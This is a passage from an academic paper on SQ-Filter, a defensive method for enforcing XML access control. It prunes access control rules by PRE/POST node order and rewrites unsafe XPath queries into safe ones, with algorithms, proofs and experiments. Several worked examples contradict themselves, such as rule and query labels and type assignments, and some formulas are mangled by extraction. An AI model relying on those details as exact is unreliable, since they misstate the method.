person node. Another example is the target node of an XPath, /site/regions/asia/item[@id="xxx"] which is an item node. Fig. 1 (a) shows a portion of an auction.DTD source extracted from the XMark [21], which we considered as a running example in our paper. Fig. 1 (b) shows that the nodes of the DTD tree were assigned with PRE (order) and POST (order) ranks, In general, if there may exist positive access control rules \((ACR^+)^s\) and negative access control rules \((ACR^-)^s\), the safe rewritten query \((Q')\) against a query \((Q)\) becomes as follows [10, 11]: \[ Q' = Q \text{ INTERSECT } (ACR^+)^s \text{ EXCEPT } ACR^-^s \\ = (Q \text{ INTERSECT } ACR^+^s) \text{ EXCEPT } (Q \text{ INTERSECT } ACR^-^s). \] In this paper, we put two problems: - First is the scope of the access control rules which is compared with the query. Here, the \(ACRs\) are all the access control rules of a user. \(ACRs_{Q_0}\) on the other hand, are all the access control rules of a user query. \[ Q' = Q \text{ INTERSECT } (ACR^+)^{Q_0} \text{ EXCEPT } ACR^-^{Q_0} \\ = (Q \text{ INTERSECT } ACR^+^{Q_0}) \text{ EXCEPT } (Q \text{ INTERSECT } ACR^-^{Q_0}) \] where $ACR^+_{sQ} \subseteq ACR^+_{s'}$, $ACR^-_{sQ} \subseteq ACR^-_{s'}$. - Second is the correctness of the rewritten query of $(Q \ INTERSECT \ ACR)$ with “*” or “/*”. The objective of the $SQ$-Filter system is to select only the necessary $ACRs$ for processing a user query, and to rewrite the unsafe query into a new safe query. In this section, we proposed the architecture of the $SQ$-Filter system and described its core components. ### 4.1 The Architecture of the $SQ$-Filter System The architecture of the $SQ$-Filter system is shown in Fig. 2. The primary input is a user query. If an input query is accepted, the output may be the original input query or a modified query which has filtered out the conflicting or redundant parts from the original query. Otherwise, the result may be rejecting the query. The $SQ$-Filter system is divided into two parts. At compile time, the $SQ$-Filter system constructs the PPS of a DTD (in section 3.4). It also constructs $ACR$ and $PREDICATE$ databases. At run time, the $SQ$-Filter system runs three components, namely, $QUERY$ $ANALYZER$, $ACR$ $FINDER$, and $QUERY$ $EXECUTOR$. ![Fig. 2. The architecture of the $SQ$-Filter system.](image) After a security officer determines the $ACRs$ of which each object part uses as an XPath expression in Fig. 3, the $ACR$ Converter stores the XPath information into the $ACR$ and $PREDICATE$ databases in Fig. 4 at compile time. Note that the entity of $PRE$ and $POST$ columns may be more than one. For example, the target node of $R1$ is $item$. The $PRE$ and $POST$ value set of the $item$ is (3, 8) and (13, 18). This value set is stored into the $PRE$ and $POST$ columns, respectively. Moreover, $R1$ has one predicate ([location = 'xxxx']). The parent element of the predicate is $item$. The entity of $PRE$-$POST$ column is (3, 13), and the entities of property, operator, and value columns are ‘location’, ‘=’, and ‘xxxx’, respectively. Finally, $P1$ as Predicate ID is stored into the $P$-$link$ column in the $ACRs$ database. The entity of $Ptr$-$ACR$-column means corresponding negative $ACRs$. In a similar way, other $ACRs$ are stored into the $ACRs$ and $PREDICATES$ databases. 4.2 QUERY ANALYZER Component The objective of the QUERY ANALYZER (QA) is to acquire information from a query. First, the QA looks up the PPS and gets the (PRE, POST) pairs of the target node of a query. Second, the QA eliminates unnecessary (PRE, POST) pairs. Finally, the QA divides the query into sub-queries for each remaining (PRE, POST) pair and obtains the predicate information of each sub-query. Given a query $Q_1$, /site/people/person[name="chang"]/phone/, the target node of $Q_1$ is phone node. The QA looks up the PPS and gets the (27, 24) value of the target node phone. Then it gets the (23, 26) value of person node, which has a predicate information (name, "="", "chang"). Note that there may also be more than one (PRE, POST) pairs of the target node of a query. Let us take a query /site/name, for example. The target node of the query is the name node. Thus, the (PRE, POST) pairs of the name are (8, 4), (18, 14), and (25, 22). In this case, a query $Q_1$ is divided into three sub-queries $Q_{i1}$, $Q_{i2}$, and $Q_{i3}$ ($Q_1 = Q_{i1} \cup Q_{i2} \cup Q_{i3}$). Its main idea is that the preorder (postorder) value of each node of a query is less (greater) than that of the target node of the query. Fig. 5 shows the pruning algorithm that eliminates the unsuitable (PRE, POST) pairs of a query. Henceforth, a query refers to each sub-query. 4.3 ACR FINDER Component The objective of the ACR FINDER (ACR-F) component is to eliminate all the unnecessary ACRs for a query. As shown in Fig. 6, namely, the PRE/POST plane of ACRs, the target node of a query induces five partitions of the plane. Each partition has a special relation with the query. Input: a query Output: suitable (PRE, POST) values of target node of the query BEGIN 1. for each \((Pr_{tn}, Po_{tn})\) value of the target node of the query 2. { for \((Pr_{step}, Po_{step})\) value of each node of the query 3. if \((Pr_{step} < Pr_{tn} \text{ and } Po_{step} > Po_{tn})\) 4. break; 5. suitable (PRE, POST) set \(\leftarrow (Pr_{tn}, Po_{tn})\) 6. } END Fig. 5. The Prune-TNs algorithm. Fig. 6. Semantics of PRE/POST plane of positive ACRs. Let \((Pr_Q, Po_Q)\), \((Pr_{ACR}, Po_{ACR})\), and \((Pr_Q', Po_Q')\) pairs be the (PRE, POST) values of a query \(Q\), an ACR, and a safe rewritten query \(Q'\), respectively. **Definition 3 [upper-right partition: FOLLOWING ACR]** FOLLOWING ACR means that the preorder and postorder values of an ACR are greater than those of a query subject to \(Pr_Q < Pr_{ACR}, Po_Q < Po_{ACR}\). **Definition 4 [lower-left partition: PRECEDING ACR]** PRECEDING ACR means that the preorder and postorder values of an ACR are less than those of a query subject to \(Pr_Q > Pr_{ACR}, Po_Q > Po_{ACR}\). The FOLLOWING and PRECEDING ACRs have no connection with the query \(Q\). Thus, we can put aside the ACRs for processing the query \(Q\). **Definition 5 [upper-left partition: ANCESTOR ACR]** ANCESTOR ACR (including PARENT ACR) means that the preorder (postorder) value of an ACR is less (greater) than that of a query subject to \(Pr_Q > Pr_{ACR}, Po_Q < Po_{ACR}\). **Definition 6 [lower-right partition: DESCENDANT ACR]** DESCENDANT ACR (including CHILD ACR) means that the preorder (postorder) value of an ACR is greater (less) than that of a query subject to \(Pr_Q < Pr_{ACR}, Po_Q > Po_{ACR}\). Definition 7 [SELF ACR] **SELF ACR** means that the (PRE, POST) pair of an ACR is equal to that of a query subject to \( Pr_Q = Pr_{ACR} \) and \( Po_Q = Po_{ACR} \). Given a query \( Q_2 \), the target node of \( Q_2 \) is an *open_auction* node. Recall the ACR database in Fig. 4. By the QA, the (PRE, POST) value of the target node *open_auction* is (30, 38). Only \( R_3 \) and \( R_6 \) are the necessary ACRs for \( Q_2 \) because they are DESCENDANT ACRs of \( Q_2 \). \( R_1 \) to \( R_5 \) are the PRECEDING ACRs of the query. They are identified as unnecessary ACRs for \( Q_2 \). Fig. 7 shows the ACR-FINDER algorithm which finds the DESCENDANT (or ANCESTOR or SELF) ACRs for a query. **Theorem 1** The ACR-FINDER algorithm abstracts all related access control rules for a query. **Proof:** Let \( (Pr_{TN}, Po_{TN}) \) be the (PRE, POST) value of the target node of a query \( Q \). Suppose that \( SN \) is any node in sub-nodes of \( Q \). Then the (PRE, POST) value of \( SN \) is as follows: \[ Pr_{TN} < Pr_{SN} < Pr_{TN} + \text{SIZE}(TN), \quad Po_{\text{lastSiblingNodeOfTN}} < Po_{SN} < Po_{TN}. \] (1) Suppose that \( FN \) is any node in following nodes of \( Q \). Then the (PRE, POST) value of \( FN \) is as follows: \[ Pr_{TN} < Pr_{FN}, \quad Po_{TN} < Po_{FN}. \] (2) Especially, the (PRE, POST) value of the first following node (first\_FN) of \( Q \) is as follows: \[ Pr_{\text{firstFN}} = Pr_{TN} + \text{SIZE}(TN) + 1. \] (3) Thus, by Eqs. (1) and (2), \( Po_{SN} < Po_{TN} < Po_{FN} \), and by Eqs. (1) and (3), we obtain Eq. (4). \[ Pr_{SN} < Pr_{TN} + \text{SIZE}(TN) < Pr_{\text{firstFN}} = Pr_{TN} + \text{SIZE}(TN) + 1. \] (4) Eq. (4) means that the preorder value of any node (SN) in the sub-nodes of \( Q \) is less than that of the first following node (first\_FN) of \( Q \). Therefore, \( Pr_{SN} < Pr_{FN} \). Therefore, we can obtain \( Pr_{SN} < Pr_{FN} \) and \( Po_{SN} < Po_{FN} \). That is, the FOLLOWING ACRs have no connection with the query, as will be proven. The same is the case with the PRECEDING ACRs. \( \Box \) 4.4 QUERY EXECUTOR Component The goal of the QUERY-EXECUTOR (QE) is to make a rewritten safe query by extending/eliminating query tree nodes and combining a set of nodes by the set operations. The positive and negative ACRs that passed by the ACR-F are classified into three groups (SELF, ANCESTOR, and DESCENDANT ACRs). The simple process of the QE is as follows: - Compare the query with each negative access control rule and produce a modified query. - Combine each modified query by UNION operation. - Compare the query with each positive access control rule and produce a modified query. - Combine each modified query by UNION operation. - Combine each result query of ④ and ② by EXCEPT operation. - Output the final result query of ⑤, \((Q \cap \text{ACRs}) \setminus (Q \cap \text{ACR}s_0)\). However, we may semantically obtain an efficient process method using an access control group such as ANCESTOR, and DESCENDANT ACRs. 4.4.1 No predicates If “predicates” are not used in a query and ACRs, there are five types of them as shown in Fig. 8. By the “Integrity Rule of ACRs (Definition 1),” the scope of a negative ACR must be included in the scope of a positive ACR. Type 1 means that positive and negative ACRs are the ANCESTOR ACRs for a query. For Type 1, the result is an empty set. Type 2 means that a positive ACR is the ANCESTOR ACR to control the parts of a query, but negative ACRs do not exist. Type 5 means that a positive ACR is a DESCENDANT ACR, and negative ACRs do not exist. For Types 2 and 5, the latter set is empty, making the result the former set. Type 3 means that a positive ACR is the ANCESTOR ACR to control the parts of a query, but parts (or all) of negative ACRs are the DESCENDANT ACRs. Type 4 means that both positive and negative ACRs are the DESCENDANT ACRs. The result for type 3 and 4 is \((Q \cap \text{ACRs}) \setminus (Q \cap \text{ACR}s_0)\). One example could be a positive ACR \(A_{CR_1}\), two negative ACRs \(A_{CR_2}\) and \(A_{CR_3}\), and two queries \(Q_1\) and \(Q_2\). \(A_{CR_1}\): /site (+), the (PRE, POST) value of the site node is (0, 50). ACR_1: /site//asia (−), the (PRE, POST) value of the asia node is (2, 9). ACR_2: /site//person/name (−), the (PRE, POST) value of the name node is (25, 22). Q_1: /site//name, the (PRE, POST) values of the name node are (8, 4), (18, 14), and (25, 22). Thus, Q_1 is divided into three sub-queries such as Q_{11} for (8, 4), Q_{12} for (18, 14), and Q_{13} for (25, 22), respectively. Q_2: /site//person, the (PRE, POST) value of the person node is (23, 26). The ACRs related to Q_{11} are ACR_1 and ACR_2. The ACR related to Q_{12} is ACR_3. The ACRs related to Q_{13} are ACR_1 and ACR_3. The ACRs related to Q_2 are ACR_2 and ACR_3. Q_{11}, Q_{12}, and Q_{13} are Type 1, Q_{12} is Type 2, and Q_2 is Type 3. In the case of Type 1, a query should be rejected at once because the scope of a query is included in the scope of a negative ACR. In the case of Type 2, authorized parts which have no connection with a query, should be eliminated by the INTERSECT operation. In the case of Type 3, not only authorized parts which have no connection with a query but also unauthorized parts of a query should be eliminated by the EXCEPT operation. Another example would be two positive ACRs ACR_{11} and ACR_{13}, a negative ACR R_{12}, and two queries Q_{11} and Q_{12}. ACR_{11}: /site/item (+), the (PRE, POST) values of the item node are (3, 8), and (13, 18). ACR_{12}: /site/item/name (−), the (PRE, POST) values of the name node are (8, 4) and (18, 14). ACR_{13}: /site/open_auction/annotation (+), the (PRE, POST) value of the annotation node is (35, 36). Q_{11}: /site//america, the (PRE, POST) value of the america node is (12, 19). Q_{12}: /site/open_auction, the (PRE, POST) value of the open_auction node is (30, 38). The ACRs related to Q_{11} are ACR_{11} and ACR_{12}, while the ACR related to Q_{12} is ACR_{13}. Therefore, Q_{11} is Type 4, and Q_{12} is Type 5. In the case of Types 4 and 5, the unauthorized parts of a query should be eliminated by the INTERSECT operation. ### 4.4.2 Handling Q INTERSECT ACR The handling Q INTERSECT ACR algorithm is very simple. First, it is to decide a standard XPath expression between a query and an ACR, which has a larger PRE value and a smaller POST value of each target node between them. Without additional computation, a standard XPath expression may however be selected by passing the ACR-F. While an ANCESTOR ACR is a standard XPath expression for a query, a query is a standard XPath expression for a DESCENDANT ACR. Second, it is to replace a wild card “*” with an actual node name (element tag) and remove unnecessary “/” axes. An “*” element is unnecessary if the DTD shows an actual element from the element (i.e., parent node) before “*” to the element (i.e., child node) after “*”. In addition, the “/” axis is also unnecessary if the DTD shows that there is a single path from the element before “/” to the element after “/”. If so, the “/” axis is replaced with the deterministic sequence of “/” steps. Let us take an example of a standard XPath expression, //regions/* /item/name. Since the (PRE, POST) value set of the target node (name) of the XPath expression is (8, 4) and (18, 14), this algorithm begins with (8, 4) and makes a temporal query, “/name”. In the reverse order, it meets the item node, and the item node links up the temporal query Input: PPS, a standard XPath expression, and \((Pr, Po)\) of the target node of the XPath expression Output: a safe rewritten query BEGIN 1. temp_query := null string; 2. for reverse order of the standard XPath { 3. if node is not * and $ // $ means “//” axis 4. temp_query := concatenate(“/node”, temp_query); 5. else if node is * { 6. find \((Pr_{former \_node}, Po_{former \_node}, LEVEL_{former \_node})\) of the former node of “*”; 7. find \((Pr_{parent}, Po_{parent}, LEVEL_{parent})\) value set of the parent nodes of the former node; 8. for each \((Pr_{parent}, Po_{parent}, LEVEL_{parent})\) value 9. if \((Pr_{parent} < Pr_{former \_node})\) and \((Po_{parent} > Po_{former \_node})\) and \((LEVEL_{former \_node} - LEVEL_{parent} = 1)\) 10. temp_query := concatenate(parent, temp_query); } 11. else if node is $ { // $ means “//” axis 12. find \((Pr_{former \_node}, Po_{former \_node}, LEVEL_{former \_node})\) of the former node of “/”; 13. latter_node := get the next node of “//” node; 14. if latter_node is empty node { 15. find and concatenate each parent node continuously into temp_query until root node; 16. break; } 17. else { 18. find \((Pr_{latter \_node}, Po_{latter \_node}, LEVEL_{latter \_node})\) value set of the latter node; 19. for each \((Pr_{latter \_node}, Po_{latter \_node}, LEVEL_{latter \_node})\) value 20. if \((Pr_{latter \_node} < Pr_{former \_node})\) and \((Po_{latter \_node} > Po_{former \_node})\) 21. \((LEVEL_{former \_node} - LEVEL_{latter \_node} = 1)\) 22. pass and break; 23. else if \((LEVEL_{former \_node} - LEVEL_{latter \_node} = 2)\) { 24. convert “/” into “/*” and find an actual node of “*”; 25. temp_query := concatenate(actual_node, temp_query); 26. break; } 27. } 28. find and concatenate each parent node continuously into temp_query before latter_node; 29. break; } 30. } // line 17 31. } // line 11 32. } // line 2 33. return safe_query := temp_query; END Fig. 9. The handling $Q_{INTERSECT\_ACR}$ algorithm. (i.e., “/item/name”) (Lines (3)-(4) in Fig. 9). If this algorithm meets the “**” node, it gets the former node (i.e., “/item/node (3, 8)). Then it finds one among many parent nodes of the former node by \(PRE_{parent} < PRE_{former \_node}, \ POST_{parent} > POST_{former \_node}, \) and \((LEVEL_{former \_node} - LEVEL_{parent}) = 1\). After which, the parent node links up the temporal query (i.e., “/asia/item/name”) (Lines (5)-(10) in Fig. 9). If this algorithm meets the “/” node, it gets the former node (i.e., “/regions/node (1, 20)) and the latter node. If the latter node is an empty node, this algorithm finds and links up each parent node into the temporal query until the root node (i.e., “/site/regions/asia/item/name”) (Lines (14)-(16) in Fig. 9). If the latter node exists, this algorithm compares each LEVEL value between the former node and the latter node. If \((LEVEL_{former \_node} - LEVEL_{latter \_node}) = 1\), the two nodes have a parent-child relation. Thus, “/” is converted into “/*” (Lines (21)-(22) in Fig. 9). If \((LEVEL_{former \_node} - LEVEL_{latter \_node}) = 2\), this algorithm converts “/” into “*” and finds an actual node of “**” (Lines (23)-(26) in Fig. 9). If \((LEVEL_{former \_node} - LEVEL_{latter \_node}) > 2\), then the two nodes have an ancestor-descendant relation. Thus, this algorithm finds and links up each parent node into temp_query continuously before the latter node (Lines (27)-(29) in Fig. 9). 4.4.3 Handling predicates A predicate is a qualifying expression that is used to select a subset of the nodes of a valid XML instance. Therefore, the predicates of ACRs or a query is appended to a safe rewritten query. There are three cases. Case 1: Query with predicates vs. ACRs without predicates: A safe rewritten query is the same case where the predicates are not used in a query or ACRs because the scope of a query without predicates includes the scope of a query with predicates. Case 2: Query without predicates vs. ACRs with predicates: Although both positive and negative ACRs are the ANCESTOR ACRs for a query of Type 1, the query is affected by any step with predicates in ACRs, which filters the selected nodes. Thus, the query should be transformed into a safe query rather than be rejected. Case 3: Query with predicates vs. ACR with predicates: It is similar to Case 2. Let us extend the \( Q \) INTERSECT ACR algorithm to handle predicates. Recall a query \( Q \) and two ACRs, \( R_3 \) and \( R_6 \). By the ACR-F, \( R_3 \) is a DESCENDANT positive ACR of \( Q \), while \( R_6 \) is a DESCENDANT negative ACR which is Type 4. \[ \begin{align*} Q_2: & \text{//open_auction[@id<100]} \\ R_3: & \text{//open_auction[quantity]/seller} \\ R_6: & \text{/site/*/open_auction[@id>50]/seller[@person="chang"]} \end{align*} \] A standard XPath expression is \( R_3 \) between \( Q_2 \) and \( R_3 \), and a standard XPath expression is \( R_6 \) between \( Q_2 \) and \( R_6 \). Thus, each immediate rewritten query is as follows: Immediate \( Q_2 \) INTERSECT \( R_3 \): /site/open_auctions/open_auction/seller Immediate \( Q_2 \) INTERSECT \( R_6 \): /site/open_auctions/open_auction/seller By the QA (see section 4.2), the QE obtains a hash table of each predicate’s content and position information of the query. Thus, the extended algorithm is to append the predicates of both ACR and \( Q \) to the immediate rewritten query. The predicates of \( Q_2 \) (i.e., \( 30, \@id, <, 100 \)) and \( R_3 \) (i.e., \( 30, \text{quantity}, , \)) are appended to an immediate \( Q_2 \) INTERSECT \( R_3 \). \[ Q_2 \text{ INTERSECT } R_3: /site/open_auctions/open_auction[@id<100]/\text{quantity}/seller \] The predicates of \( Q_2 \) (i.e., \( 30, \@id, <, 100 \)) and \( R_6 \) (i.e., \( 30, \@id, >, 50 \), \( 33, \@person, =, \text{chang} \)) are appended to an immediate \( Q_2 \) INTERSECT \( R_6 \). \[ Q_2 \text{ INTERSECT } R_6: /site/open_auctions/open_auction[@id<100 \text{ and } @id>50]/\text{seller}[@person=\text{"chang"}] \] The final rewritten safe query \( Q_2' \) is as follows: \( Q' = (Q \text{ INTERSECT } R_3) \text{ EXCEPT } (Q \text{ INTERSECT } R_6) \) \( = (/\text{site/open_auctions/open_auction[@id<100][quantity]/seller} \text{ EXCEPT} \) \( (/\text{site/open_auctions/open_auction[@id<100 and @id>50]seller[@person = "chang"]}) \) 5. CORRECTNESS The goal of the SQ-Filter system is to transform an unsafe query into a safe one as shown in section 4.4. \( Q' = Q \text{ INTERSECT } (ACR^+ Q \text{ EXCEPT } ACR^{-} s_Q) \) \( = (Q \text{ INTERSECT } ACR^+ Q \text{ EXCEPT } (Q \text{ INTERSECT } ACR^{-} s_Q)) \) where \[ ACR^+ Q \subseteq ACR^+, ACR^{-} s_Q \subseteq ACR^-. \] (5) The \((Q \text{ INTERSECT } ACR^+ Q)\) set operation excludes unauthorized parts from a query. The \((Q \text{ INTERSECT } ACR^{-} s_Q)\) set operation finds the access-denied parts of the query. Although the semantics of each result query is different, both set operations are the same from the process method point of view. We defined a symbol “\(\cap\)” between two XPath expressions, \(p_i\) and \(p_j\). **Definition 8** \([p_i \cap p_j]\) \(p_i \cap p_j\) is the XPath expression(s) representing the nodes specified by \(p_i\) and \(p_j\). If the preorder value of \(p_i\) is less than that of \(p_j\) and the postorder value of \(p_i\) is greater than that of \(p_j\), then \[ Pr_{p_i \cap p_j} = Pr_{p_j}, Po_{p_i \cap p_j} = Po_{p_j}. \] If the preorder value of \(p_i\) is equal to that of \(p_j\) and the postorder value of \(p_i\) is equal to that of \(p_j\), then \[ Pr_{p_i \cap p_j} = Pr_{p_j} = Pr_{p_i}, Po_{p_i \cap p_j} = Po_{p_j} = Po_{p_i}. \] **Theorem 2** The QUERY EXECUTOR algorithm always generates the correct and safe rewritten query when \(Q\) and \(ACR\) are limited to XPath expressions without predicates. **Proof:** Let \(Q\) and \(ACR\) be a query and an access control rule, respectively. By Definition 8, \(Q \cap ACR\) is the XPath expression representing the nodes specified by \(Q\) and \(ACR\). Since each target node of a DTD structure has a unique path, generating the correct and safe rewritten query is as follows: \[ Pr_Q = Pr_{Q \cap ACR}, Po_Q = Po_{Q \cap ACR}. \] By the ACR-F, as shown in section 4.3, an \(ACR\) for \(Q\) is one out of ANCESTROR ACR, DESCENDANT ACR, or SELF ACR. The proof follows a case-by-case analysis of each of them. By Definition 5, $\text{ANCESTOR ACR}$, $\text{Pr}_Q > \text{Pr}_{\text{ACR}}$, $\text{Po}_Q < \text{Po}_{\text{ACR}}$, $\text{Pr}_Q = \text{Pr}_Q$, and $\text{Po}_Q = \text{Po}_Q$, and by Definition 8, $\text{Pr}_{Q-\text{ACR}} = \text{Pr}_Q$, $\text{Po}_{Q-\text{ACR}} = \text{Po}_Q$, then $\text{Pr}_Q = \text{Pr}_{Q-\text{ACR}}$, $\text{Po}_Q = \text{Po}_{Q-\text{ACR}}$. By Definition 6, $\text{DESCENDANT ACR}$, $\text{Pr}_Q < \text{Pr}_{\text{ACR}}$, $\text{Po}_Q > \text{Po}_{\text{ACR}}$, $\text{Pr}_Q = \text{Pr}_{\text{ACR}}$, $\text{Po}_Q = \text{Po}_{\text{ACR}}$, and by Definition 8, $\text{Pr}_{Q-\text{ACR}} = \text{Pr}_Q$ (or $\text{Pr}_{\text{ACR}}$), $\text{Po}_{Q-\text{ACR}} = \text{Po}_Q$ (or $\text{Po}_{\text{ACR}}$), then $\text{Pr}_Q = \text{Pr}_{Q-\text{ACR}}$, $\text{Po}_Q = \text{Po}_{Q-\text{ACR}}$. By Definition 7, $\text{SELF ACR}$, $\text{Pr}_Q = \text{Pr}_{Q^*} = \text{Pr}_{\text{ACR}}$, $\text{Po}_Q = \text{Po}_{Q^*} = \text{Po}_{\text{ACR}}$, and by Definition 8, $\text{Pr}_{Q-\text{ACR}} = \text{Pr}_Q$ (or $\text{Pr}_{\text{ACR}}$), $\text{Po}_{Q-\text{ACR}} = \text{Po}_Q$ (or $\text{Po}_{\text{ACR}}$), then $\text{Pr}_Q = \text{Pr}_{Q-\text{ACR}}$, $\text{Po}_Q = \text{Po}_{Q-\text{ACR}}$. Theorem 3 The QUERY EXECUTOR algorithm always generates the correct and safe modified query when $Q$ and $\text{ACR}$ are XPath expressions with predicates. **Proof:** For an XPath expression ($pp$) with predicates, we removed the predicates to construct an XPath expression ($p$) without predicates. The special relation is as follows: $$\text{Pr}_{pp} = \text{Pr}_p, \text{Po}_{pp} = \text{Po}_p, pp \cap p = pp.$$ \hspace{1cm} (6) Let a query with predicates, the query without predicates, an access control rule with predicates, and the access control rule without predicates be $Q$, $Q^*$, $\text{ACR}$, and $\text{ACR^*}$, respectively. Then we have $$\text{Pr}_Q = \text{Pr}_{Q^*}, \text{Po}_Q = \text{Po}_{Q^*}, Q \cap Q^* = Q,$$ $$\text{Pr}_{\text{ACR}} = \text{Pr}_{\text{ACR^*}}, \text{Po}_{\text{ACR}} = \text{Po}_{\text{ACR^*}}, \text{ACR} \cap \text{ACR^*} = \text{ACR}.\hspace{1cm} (7)$$ Let $Q' = (Q \cap \text{ACR})$ and $Q'^* = (Q^* \cap \text{ACR^*})$ be the output of QE. By Eq. (6), $Q' = Q' \cap Q'^*$. Thus, $Q' = Q \cap \text{ACR} \cap Q^* \cap \text{ACR^*}$. By Eqs. (7) and (8), $Q' = Q \cap \text{ACR}$. \quad $\square$ 6. EXPERIMENTS We implemented the $\text{SQ-Filter}$ and the $\text{SQ-NFA}$ (combining $\text{SQ-Filter}$ with the NFA technique) in the Java programming language. And then we compared the performance of them with the QFilter [11] according to syntactic data sets generated by the publicly available XMark [21] for each experiment. 6.1 Experiment I: Correctness of Detecting Rejection Queries The many queries on XML data have path expressions with “//” axes. The shared NFA method without the metadata of the DTD, the process of rewriting queries may be incorrect because more states are being traversed to process “*” and “/”. To demonstrate this fact we made 20 intentional rejection XPath queries for each query type, and actually measured the number of filtering the rejection queries. Rejection query is a query that is always denied. In Fig. 10, we show that though the QFilter’s rate of filtering rejection queries starting with the “//” axis is 0%, but on the other hand, the $\text{SQ-Filter}$ and the $\text{SQ-}$ --- 1 The experiments were performed on a Pentium IV 2.66GHz, an MS-Windows XP and 1 GB main memory. NFA completely filter the rejection queries. Without order information among elements, if a user query contains //-child and a shared NFA does not contain /-child or //-child state, the navigation of the shared NFA runs to each final state. If answer model is “Answer-as-nodes”, the query is rejected. However, if answer model is “Answer-as-sub-trees”, the QFilter appends //-child to each final state. As a result, the output of the query $Q_2$ may be an incorrectly rewritten query as follows: $$(//site/regions/* /item[@location="LA"]//open_auction[@id<100]) \text{UNION}$$ $$(/site/people/person[name="chang"]// open_auction[@id<100]) \text{UNION}$$ $$(/site/open_auctions/ open_auction[@id<100]) \text{UNION}$$ $$(//open_auction[quantity][@id<100]/seller)) \text{EXCEPT}$$ $$(//site/regions/* /item/payment// open_auction[@id<100]) \text{UNION}$$ $$(/site/people/person/creditcard// open_auction[@id<100]) \text{UNION}$$ $$(/site/*/open_auction[@id<100and id>50]))$$ ### 6.2 Experiment II: Estimating the Average Processing Time Against No Predicates Second, we made 100 XPath queries for each query type. In section 3.3, for the strict data security, we used “most specific precedence” for the propagation policy, and “closed policy” for decision policy. In Definition 1, it is impossible for any node, which is not in the scope of positive ACRs, to have negative ACRs. For each query, so, we made 4 positive ACRs at higher level nodes and 8 negative ACRs at lower level nodes randomly. And then we measured the average processing time for the output (rejection, rewritten query) of the SQ-Filter, SQ-NFA, and QFilter. Before estimating the average processing time, we measured the speed of each filter construction. The SQ-Filter or the SQ-NFA construction time refers to the hash table generation time of a DTD as shown in Fig. 1 (c). The QFilter construction time means two shared NFA generation time (i.e., negative and positive ACRs). Fig. 11 shows each construction time. From this, the metadata of a DTD has minimal overhead. In case of queries with only “/” axes as shown in Fig. 12, the SQ-Filter, SQ-NFA and QFilter make little difference. In case of queries with “//” axis, the SQ-Filter and the SQ-NFA can rewrite queries faster than the QFilter which includes the exhaustive navigation of NFA. Third, we measured the total number of ACRs used, and the average processing time per 30, 50, 100, 200, 300, and 500 random queries. For the verification of the ACR-F algorithm which eliminates unnecessary ACRs, we made more ACRs (7 positive and 18 negative) for each query. The QFilter uses all ACRs per each query, so the total number of ACRs is 750 per 30 queries. By the ACR-F in section 4.3, however, the SQ-Filter and the SQ-NFA use 102 ACRs per 30 queries as shown in Fig. 13. By the QE using the PPS metadata as shown in Fig. 1 (c), the SQ-Filter and the SQ-NFA can rewrite queries with the "*" wildcard and the "//" axis faster than the QFilter. The result is shown in Fig. 14. Each processing time includes the construction time as shown in Fig. 11. 6.3 Experiment III: Handling Predicates We measured the processing time of handing predicates for the outputs of the SQ-Filter system. The result is shown in Fig. 15. Each processing time excludes the construction time as shown in Fig. 11. From this, we can also see that the simple handling predicates method does not account for much. 7. CONCLUSION The SQ-Filter system for XML access control enforcement described in this paper exploits the tree properties encoded in the PRE/POST plane to eliminate unnecessary access control rules for a user query and to reject unauthorized queries ahead of rewriting. In addition, the SQ-Filter system exploits the simple hash tree of a DTD to find an actual node of a "*" node and a parent node of a node with the descendant-or-self axis ("//"), and to rewrite an unsafe query into a safe one by receiving help from operations combining the two sets of node. By the QUERY ANALYZER component and the Prune_TN algorithm we could completely filter the rejection queries. By the ACR FINDER component we could eliminate all the unnecessary ACRs for a query. By the QUERY-EXECUTOR component we could make a rewritten safe query by extending/eliminating query tree nodes and combining a set of nodes by the set operations. Our mechanism is a pre-processing one, which is independent from the underlying XML database engine. Thus, the techniques proposed in this paper could be built on top of any XML DBMS. In the future, we will think over complex predicate optimization. Since our approach is not entirely suitable for system specification, we plan to extend our techniques to handle a dynamic well-formed XML. REFERENCES 18. XQuery 1.0 and XPath 2.0, http://www.w3.org/TR/xquery-full-text/. Changwoo Byun (邊秀又) received the B.S., M.S. and Ph.D. degrees in the Department of Computer Science and Engineering from Sogang University, Seoul, Korea, in 1999, 2001 and 2007 respectively. Since Sep. 2007, he has been working in the Department of Computer Systems and Engineering of Inha Technical College. His areas of research include data stream management system, role-based access control model, access control for distributed systems, access control for XML data, XML transaction management, and Ubiquitous security. Seog Park (朴錫) is a Professor of Computer Science at Sogang University. He received the B.S. degree in Computer Science from Seoul National University in 1978, the M.S. and the Ph.D. degrees in Computer Science from Korea Advanced Institute of Science and Technology (KAIST) in 1980 and 1983, respectively. Since 1983, he has been working in the Department of Computer Science and Engineering, Sogang University. His major research areas are database security, real-time systems, data warehouse, digital library, multimedia database systems, role-based access control, Web database, and data stream management system. Dr. Park is a member of the IEEE Computer Society, ACM and the Korean Institute of Information Scientists and Engineers.
{"Source-Url": "https://pdfs.semanticscholar.org/37ae/95a1ad2e0ebbe1a74512feef054bad6a36ab.pdf", "len_cl100k_base": 12645, "olmocr-version": "0.1.49", "pdf-total-pages": 21, "total-fallback-pages": 0, "total-input-tokens": 68206, "total-output-tokens": 15399, "length": "2e13", "weborganizer": {"__label__adult": 0.0004012584686279297, "__label__art_design": 0.000576019287109375, "__label__crime_law": 0.0011119842529296875, "__label__education_jobs": 0.002288818359375, "__label__entertainment": 9.745359420776369e-05, "__label__fashion_beauty": 0.00022161006927490232, "__label__finance_business": 0.0006346702575683594, "__label__food_dining": 0.00031566619873046875, "__label__games": 0.0005168914794921875, "__label__hardware": 0.00130462646484375, "__label__health": 0.0006208419799804688, "__label__history": 0.0003681182861328125, "__label__home_hobbies": 0.00013768672943115234, "__label__industrial": 0.0006165504455566406, "__label__literature": 0.0004696846008300781, "__label__politics": 0.0003745555877685547, "__label__religion": 0.00048160552978515625, "__label__science_tech": 0.1724853515625, "__label__social_life": 0.00016164779663085938, "__label__software": 0.03680419921875, "__label__software_dev": 0.779296875, "__label__sports_fitness": 0.00020802021026611328, "__label__transportation": 0.00044083595275878906, "__label__travel": 0.00019443035125732425}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 50031, 0.03663]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 50031, 0.62444]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 50031, 0.8467]], 